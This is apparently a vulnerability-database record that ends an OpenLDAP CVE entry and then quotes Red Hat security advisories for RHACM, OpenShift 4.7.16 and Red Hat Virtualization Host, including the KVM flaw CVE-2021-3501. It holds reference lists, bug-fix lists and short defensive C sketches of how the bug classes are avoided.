"url": "https://access.redhat.com/security/cve/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-6829"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12652"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12403"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20388"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12243"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-14973"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17498"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-7595"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-19956"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17546"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12400"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14973"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12402"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2017-12652"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12401"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17546"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17498"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19126"
},
{
"trust": 0.3,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-5482"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12450"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20386"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14822"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14822"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12450"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20386"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19126"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12400"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-5313"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4352-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1240"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-18874"
},
{
"trust": 0.2,
"url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18874"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14365"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/674.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4041"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-116-01"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/openldap"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4352-2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4264"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-2974"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2226"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2974"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2752"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.3/release_notes/ocp-4-3-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14352"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2225"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12825"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2181"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2182"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.3/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8675"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-18190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2224"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20907"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1079"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8625"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12402"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1971"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20228"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12401"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3156"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3447"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1971"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20180"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12403"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14422"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4255"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.48+dfsg-1ubuntu1.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.42+dfsg-2ubuntu3.8"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.45+dfsg-1ubuntu1.5"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.49+dfsg-2ubuntu1.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4254"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "PACKETSTORM",
"id": "168811"
},
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "PACKETSTORM",
"id": "159552"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-164902",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-12243",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168811",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157602",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159661",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157601",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159552",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-12243",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-28T00:00:00",
"db": "VULHUB",
"id": "VHN-164902",
"ident": null
},
{
"date": "2020-04-28T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12243",
"ident": null
},
{
"date": "2020-04-28T19:12:00",
"db": "PACKETSTORM",
"id": "168811",
"ident": null
},
{
"date": "2020-05-07T15:33:32",
"db": "PACKETSTORM",
"id": "157602",
"ident": null
},
{
"date": "2020-10-21T15:40:32",
"db": "PACKETSTORM",
"id": "159661",
"ident": null
},
{
"date": "2021-04-09T15:06:13",
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"date": "2020-10-14T16:52:18",
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"date": "2020-05-07T15:33:27",
"db": "PACKETSTORM",
"id": "157601",
"ident": null
},
{
"date": "2020-10-14T16:52:12",
"db": "PACKETSTORM",
"id": "159552",
"ident": null
},
{
"date": "2020-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"ident": null
},
{
"date": "2020-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"ident": null
},
{
"date": "2020-04-28T19:15:12.267000",
"db": "NVD",
"id": "CVE-2020-12243",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-04-29T00:00:00",
"db": "VULHUB",
"id": "VHN-164902",
"ident": null
},
{
"date": "2022-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12243",
"ident": null
},
{
"date": "2022-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"ident": null
},
{
"date": "2020-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"ident": null
},
{
"date": "2024-11-21T04:59:22.057000",
"db": "NVD",
"id": "CVE-2020-12243",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "OpenLDAP Resource exhaustion vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
}
],
"trust": 0.6
}
}
VAR-202105-0904
Vulnerability from variot - Updated: 2026-04-10 22:39. A flaw was found in the Linux kernel in versions before 5.12. The value of internal.ndata, in the KVM API, is mapped to an array index that can be updated by a user process at any time, which could lead to an out-of-bounds write. The highest threat from this vulnerability is to data integrity and system availability. The Linux kernel is vulnerable to an out-of-bounds write; information may be tampered with, and the system may be put into a denial-of-service (DoS) state. KVM is the Linux kernel's kernel-based virtual machine subsystem. This vulnerability could result in an out-of-bounds write. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/
Security fixes:
-
redisgraph-tls: redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)
-
console-header-container: nodejs-netmask: improper input validation of octal input data (CVE-2021-28092)
-
console-container: nodejs-is-svg: ReDoS via malicious string (CVE-2021-28918)
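The netmask flaw in the list above stems from a parser that reads leading-zero IP octets as decimal while the operating system's resolver reads them as octal, so a validity check and the actual connection target can disagree. A minimal C sketch of the mismatch (hypothetical helper names; this is not the nodejs-netmask code):

```c
#include <stdlib.h>

/* Hypothetical illustration of the CVE-2021-28092 bug class: a validator
 * that parses "010" as decimal 10, while inet_aton-style parsers honor
 * the leading zero and yield octal 8. An allow/deny decision made on the
 * first interpretation can be bypassed via the second. */
long octet_as_validator_sees_it(const char *s)
{
    return strtol(s, NULL, 10);   /* leading zero ignored: "010" -> 10 */
}

long octet_as_resolver_sees_it(const char *s)
{
    return strtol(s, NULL, 0);    /* base 0 honors the 0 prefix: "010" -> 8 */
}
```

A check built this way may classify "0177.0.0.1" as the public address 177.0.0.1 while the OS actually connects to 127.0.0.1, which is the class of filter bypass the advisory describes.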
Bug fixes:
-
RHACM 2.2.4 images (BZ# 1957254)
-
Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 (BZ#1950832)
-
ACM Operator should support using the default route TLS (BZ# 1955270)
-
The scrolling bar for search filter does not work properly (BZ# 1956852)
-
Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)
-
The proxy setup in install-config.yaml is not worked when IPI installing with RHACM (BZ# 1960181)
-
Unable to make SSH connection to a Bitbucket server (BZ# 1966513)
-
Observability Thanos store shard crashing - cannot unmarshall DNS message (BZ# 1967890)
-
Bugs fixed (https://bugzilla.redhat.com/):
1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data 1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7 1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory 1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters 1954535 - Reinstall Submariner - No endpoints found on one cluster 1955270 - ACM Operator should support using the default route TLS 1956852 - The scrolling bar for search filter does not work properly 1957254 - RHACM 2.2.4 images 1959426 - Limits on Length of MultiClusterObservability Resource Name 1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. 1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service" 1966513 - Unable to make SSH connection to a Bitbucket server 1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. 1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.16. See the following advisories for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2287
Space precludes documenting all of the container images in this advisory.
Additional Changes:
This update also fixes several bugs. Documentation for these changes is available from the Release Notes document linked to in the References section. Solution:
For OpenShift Container Platform 4.7 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1889659 - [Assisted-4.6] [cluster validation] Number of hosts validation is not enforced when Automatic role assigned 1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation 1932638 - Removing ssh keys MC does not remove the key from authorized_keys 1934180 - vsphere-problem-detector should check if datastore is part of datastore cluster 1937396 - when kuryr quotas are unlimited, we should not sent alerts 1939014 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP 1939553 - Binary file uploaded to a secret in OCP 4 GUI is not properly converted to Base64-encoded string 1940275 - [IPI Baremetal] Revert Sending full ignition to masters 1942603 - [4.7z] Network policies in ovn-kubernetes don't support external traffic from router when the endpoint publishing strategy is HostNetwork 1944046 - Warn users when using an unsupported browser such as IE 1944575 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results 1945702 - Operator dependency not consistently chosen from default channel 1946682 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall 1947091 - Incorrect skipped status for conditional tasks in the pipeline run 1947427 - Bootstrap ignition shim doesn't follow proxy settings 1948398 - [oVirt] remove ovirt_cafile from ovirt-credentials secret 1949541 - Kuryr-Controller crashes when it's missing the status object 1950290 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation 1951210 - Pod log filename no longer in -.log format 1953475 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc 1954121 - [ceo] [release-4.7] Operator goes degraded when a second internal node ip is added after install 1955210 - OCP 4.6 Build fails when filename contains an umlaut 1955418 - 4.8 -> 4.7 rollbacks broken on unrecognized flowschema openshift-etcd-operator 1955482 - [4.7] Drop high-cardinality metrics from kube-state-metrics which aren't used 1955600 - e2e unidling test flakes in CI 1956565 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry 1956980 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. 1957308 - Customer tags cannot be seen in S3 level when set spec.managementState from Managed-> Removed-> Managed in configs.imageregistry with high ratio 1957499 - OperatorHub - console accepts any value for "Infrastructure features" annotation 1958416 - openshift-oauth-apiserver apiserver pod crashloopbackoffs 1958467 - [4.7] Webscale: sriov vfs are not created and sriovnetworknodestate indicates sync succeeded - state is not correct 1958873 - Device Replacemet UI, The status of the disk is "replacement ready" before I clicked on "start replacement" 1959546 - [4.7] storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions 1959737 - Unable to assign nodes for EgressIP even if the egress-assignable label is set 1960093 - Console not works well against a proxy in front of openshift clusters 1960111 - Port 8080 of oVirt CSI driver is causing collisions with other services 1960542 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960544 - Overly generic CSS rules for dd and dt elements breaks styling elsewhere in console 1960562 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1960589 - manifests: extra "spec.version" in console quickstarts makes CVO hotloop 1960645 - [Backport 4.7] Add virt_platform metric to the collected metrics 1960686 - GlobalConfigPage is constantly requesting resources 1961069 - CMO end-to-end tests work only on AWS 1961367 - Conformance tests for OpenStack require the Cinder client that is not included in the "tests" image 1961518 - manifests: invalid selector in ServiceMonitor makes CVO hotloop 1961557 - [release-4.7] respect the shutdown-delay-duration from OpenShiftAPIServerConfig 1961719 - manifests: invalid namespace in ClusterRoleBinding makes CVO hotloop 1961887 - TaskRuns Tab in PipelineRun Details Page makes cluster based calls for TaskRuns 1962314 - openshift-marketplace pods in CrashLoopBackOff state after RHACS installed with an SCC with readOnlyFileSystem set to true 1962493 - Kebab menu of taskrun contains Edit options which should not be present 1962637 - Nodes tainted after configuring additional host iface 1962819 - OCP v4.7 installation with OVN-Kubernetes fails with error "egress bandwidth restriction -1 is not equals" 1962949 - e2e-metal-ipi and related jobs fail to bootstrap due to multipe VIP's 1963141 - packageserver clusteroperator Available condition set to false on any Deployment spec change 1963243 - HAproxy pod logs showing error "another server named 'pod:httpd-7c7ccfffdc-wdkvk:httpd:8080-tcp:10.128.x.x:8080' was already defined at line 326, please use distinct names" 1964322 - UI, The status of "Used Capacity Breakdown [Pods]" is "Not available" 1964568 - Failed to upgrade from 4.6.25 to 4.7.8 due to the machine-config degradation 1965075 - [4.7z] After upgrade from 4.5.16 to 4.6.17, customer's application is seeing re-transmits 1965932 - [oauth-server] bump k8s.io/apiserver to 1.20.3 1966358 - Build failure on s390x 1966798 - [tests] Release 4.7 broken due to the usage of wrong OCS version 1966810 - Failing Test vendor/k8s.io/kube-aggregator/pkg/apiserver TestProxyCertReload due to hardcoded certificate expiration 1967328 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud 1967966 - prometheus-k8s pods can't be scheduled due to volume node affinity conflict 1967972 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews 1970322 - [OVN]EgressFirewall doesn't work well as expected
Red Hat Security Advisory
Synopsis: Important: Red Hat Virtualization Host security update [ovirt-4.4.6] Advisory ID: RHSA-2021:2522-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2021:2522 Issue date: 2021-06-22 CVE Names: CVE-2020-24489 CVE-2021-3501 CVE-2021-3560 CVE-2021-27219
- Summary:
An update for imgbased, redhat-release-virtualization-host, and redhat-virtualization-host is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64 Red Hat Virtualization 4 Hypervisor for RHEL 8 - x86_64
- Description:
The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
Security Fix(es):
- glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits (CVE-2021-27219)
- kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run (CVE-2021-3501)
- polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)
- hw: vt-d related privilege escalation (CVE-2020-24489)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
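The KVM issue above (CVE-2021-3501) is an instance of a user-updatable value being used as an array index: the index lives in memory shared with userspace, so it can change between a bounds check and the write it guards. The following is a minimal, hypothetical user-space sketch of the safe pattern (snapshot once, validate the snapshot, index only with the local copy); the struct and function names are illustrative and are not the actual KVM code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a structure whose index field is shared
 * with userspace and can therefore change at any time. */
struct shared_run {
    size_t ndata;           /* attacker-updatable at any time */
    unsigned long data[16];
};

/* Safe pattern: fetch the shared field exactly once, validate the
 * local snapshot, and never re-read the shared copy. Re-reading
 * run->ndata after the check would reintroduce the out-of-bounds
 * write, since a concurrent update could raise it past the bound. */
int record_safe(struct shared_run *run, unsigned long value)
{
    size_t idx = run->ndata;                            /* single fetch */
    if (idx >= sizeof(run->data) / sizeof(run->data[0]))
        return -1;                                      /* reject out-of-range index */
    run->data[idx] = value;                             /* validated snapshot only */
    return 0;
}
```

The key design point is that validation and use operate on the same local value, which userspace cannot modify.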
Bug Fix(es):
- Previously, systemtap dependencies were not included in the RHV-H channel. Therefore, systemtap could not be installed. In this release, the systemtap dependencies have been included in the channel, resolving the issue. (BZ#1903997)
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/2974891
- Bugs fixed (https://bugzilla.redhat.com/):
1903997 - Provide systemtap dependencies within RHV-H channel
1929858 - CVE-2021-27219 glib: integer overflow in g_bytes_new function on 64-bit platforms due to an implicit cast from 64 bits to 32 bits
1950136 - CVE-2021-3501 kernel: userspace applications can misuse the KVM API to cause a write of 16 bytes at an offset up to 32 GB from vcpu->run
1961710 - CVE-2021-3560 polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync()
1962650 - CVE-2020-24489 hw: vt-d related privilege escalation
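The glib flaw fixed here (CVE-2021-27219) belongs to a well-known bug class: a 64-bit length implicitly cast to a 32-bit parameter, so the buffer is allocated from the truncated value while the copy uses the full one. The sketch below illustrates the class with hypothetical helper names (they are not the glib API); the upstream fix introduced g_memdup2, which keeps a full-width gsize length end to end.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Returns 1 if passing `len` through a 32-bit parameter would silently
 * change its value, i.e. the call would truncate on a 64-bit platform. */
int would_truncate(uint64_t len)
{
    uint32_t narrowed = (uint32_t)len;   /* the implicit cast in the bug class */
    return (uint64_t)narrowed != len;
}

/* Safe duplication keeps the length at full width from caller to
 * allocator to memcpy, so no silent narrowing can occur.
 * (Hypothetical helper; sketch assumes a 64-bit size_t.) */
void *dup_bytes_safe(const void *src, uint64_t len)
{
    void *out = malloc(len ? (size_t)len : 1);
    if (out != NULL)
        memcpy(out, src, (size_t)len);
    return out;
}
```

In the vulnerable shape, malloc would receive the narrowed 32-bit value while memcpy received the original 64-bit one, yielding a heap overflow for lengths of 4 GiB or more.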
- Package List:
Red Hat Virtualization 4 Hypervisor for RHEL 8:
Source: redhat-virtualization-host-4.4.6-20210615.0.el8_4.src.rpm
x86_64: redhat-virtualization-host-image-update-4.4.6-20210615.0.el8_4.x86_64.rpm
RHEL 8-based RHEV-H for RHEV 4 (build requirements):
